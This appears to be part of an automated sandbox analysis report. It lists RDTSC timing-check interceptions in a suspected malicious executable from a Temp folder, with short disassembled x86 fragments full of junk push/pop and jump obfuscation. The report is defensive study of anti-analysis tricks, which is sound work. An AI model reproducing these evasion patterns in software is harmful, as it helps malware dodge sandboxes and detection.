Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 911CC4 second address: 911CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918820 second address: 91882A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 916A91 second address: 916B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 js 00007FEE851EFD88h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push ebx 0x00000012 jns 00007FEE851EFD88h 0x00000018 pop edi 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 and ebx, dword ptr [ebp+122D2A3Dh] 0x0000002d mov ebx, dword ptr [ebp+122D2F73h] 0x00000033 mov eax, dword ptr [ebp+122D171Dh] 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007FEE851EFD88h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 movzx edi, si 0x00000056 push FFFFFFFFh 0x00000058 jmp 00007FEE851EFD99h 0x0000005d nop 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 jmp 00007FEE851EFD94h 0x00000066 pushad 0x00000067 popad 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 916B29 second address: 916B33 instructions: 0x00000000 rdtsc 0x00000002 js 00007FEE84E88FCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920CFF second address: 920D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920D03 second address: 920D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 je 00007FEE84E88FC6h 0x0000000d pop ebx 0x0000000e pushad 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jnp 00007FEE84E88FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920D24 second address: 920D4D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE851EFD86h 0x00000008 jmp 00007FEE851EFD96h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 js 00007FEE851EFD86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C1399 second address: 8C13A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FEE84E88FC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13A4 second address: 8C13B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13B3 second address: 8C13B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13B7 second address: 8C13D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEE851EFD8Eh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13D7 second address: 8C13DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13DF second address: 8C13E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8C13E3 second address: 8C13EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920487 second address: 9204BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FEE851EFD92h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEE851EFD97h 0x00000012 jng 00007FEE851EFD86h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9204BD second address: 9204C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 920613 second address: 920619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9189FC second address: 918A13 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FEE84E88FCBh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918A13 second address: 918A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 918A17 second address: 918AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d popad 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1843h], edi 0x00000015 or ebx, dword ptr [ebp+122D1BFEh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jmp 00007FEE84E88FCDh 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FEE84E88FC8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D1701h] 0x0000004e push FFFFFFFFh 0x00000050 jmp 00007FEE84E88FD0h 0x00000055 nop 0x00000056 jg 00007FEE84E88FD8h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jl 00007FEE84E88FDDh 0x00000065 jmp 00007FEE84E88FD7h 0x0000006a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92D663 second address: 92D668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBC6 second address: 92DBD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007FEE84E88FC6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBD7 second address: 92DBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEE851EFD86h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DBE2 second address: 92DBEE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE7C second address: 92DE80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE80 second address: 92DE86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 92DE86 second address: 92DE8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDEFC second address: 8BDF2A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEE84E88FCEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FEE84E88FD0h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF2A second address: 8BDF32 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF32 second address: 8BDF39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8BDF08 second address: 8BDF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jmp 00007FEE851EFD90h 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932ABA second address: 932ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEE84E88FD0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEE84E88FCBh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C3D second address: 932C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C41 second address: 932C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 932C45 second address: 932C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FEE851EFD8Fh 0x0000000e jns 00007FEE851EFD97h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEE851EFD95h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9334BB second address: 9334E3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE84E88FD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FEE84E88FCCh 0x0000000f jo 00007FEE84E88FC6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93392E second address: 93393A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352D0 second address: 9352D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352D4 second address: 9352F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FEE851EFD86h 0x00000008 jns 00007FEE851EFD86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007FEE851EFD92h 0x00000016 jp 00007FEE851EFD86h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352F2 second address: 9352F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352F6 second address: 9352FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9352FB second address: 93533D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD7h 0x00000009 pop eax 0x0000000a jo 00007FEE84E88FC8h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FEE84E88FD5h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93533D second address: 935347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 935347 second address: 93534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93534C second address: 935356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FEE851EFD86h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 935356 second address: 935366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93BA8F second address: 93BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DF1 second address: 906DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DF5 second address: 906DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906DFB second address: 906E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 906F7A second address: 906F7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9070F0 second address: 907101 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907101 second address: 907106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907106 second address: 90710C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90710C second address: 907110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907110 second address: 907114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907114 second address: 90712B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 sub dword ptr [ebp+1248E981h], ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 90712B second address: 907130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907130 second address: 907142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD8Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907474 second address: 907487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE84E88FCBh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907487 second address: 9074F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FEE851EFD88h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D3862h] 0x0000002c mov dword ptr [ebp+12473258h], ebx 0x00000032 and edx, 1B74CB03h 0x00000038 push 00000004h 0x0000003a jmp 00007FEE851EFD98h 0x0000003f nop 0x00000040 pushad 0x00000041 jmp 00007FEE851EFD8Eh 0x00000046 push esi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9074F2 second address: 9074FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9074FE second address: 907502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BA4 second address: 907BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEE84E88FCAh 0x0000000a popad 0x0000000b nop 0x0000000c lea eax, dword ptr [ebp+1249B6EDh] 0x00000012 mov cx, di 0x00000015 mov edi, dword ptr [ebp+122D2D85h] 0x0000001b nop 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BCA second address: 907BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEE851EFD93h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907BE5 second address: 907C53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FEE84E88FD6h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FEE84E88FC8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b lea eax, dword ptr [ebp+1249B6A9h] 0x00000031 mov di, cx 0x00000034 nop 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FEE84E88FCAh 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907C53 second address: 907C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 907C57 second address: 8E517F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FEE84E88FCDh 0x0000000d nop 0x0000000e call dword ptr [ebp+122D59E6h] 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C263 second address: 93C267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C267 second address: 93C28C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCCh 0x00000007 jne 00007FEE84E88FC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 jnp 00007FEE84E88FC8h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C28C second address: 93C2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE851EFD90h 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c jc 00007FEE851EFD88h 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2B3 second address: 93C2C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2C6 second address: 93C2CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2CC second address: 93C2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C2D5 second address: 93C2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C6E0 second address: 93C718 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FEE84E88FCAh 0x0000000c pushad 0x0000000d jne 00007FEE84E88FC6h 0x00000013 jnp 00007FEE84E88FC6h 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c jmp 00007FEE84E88FCCh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 jp 00007FEE84E88FC6h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 93C718 second address: 93C71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 942811 second address: 94281B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 94281B second address: 942821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
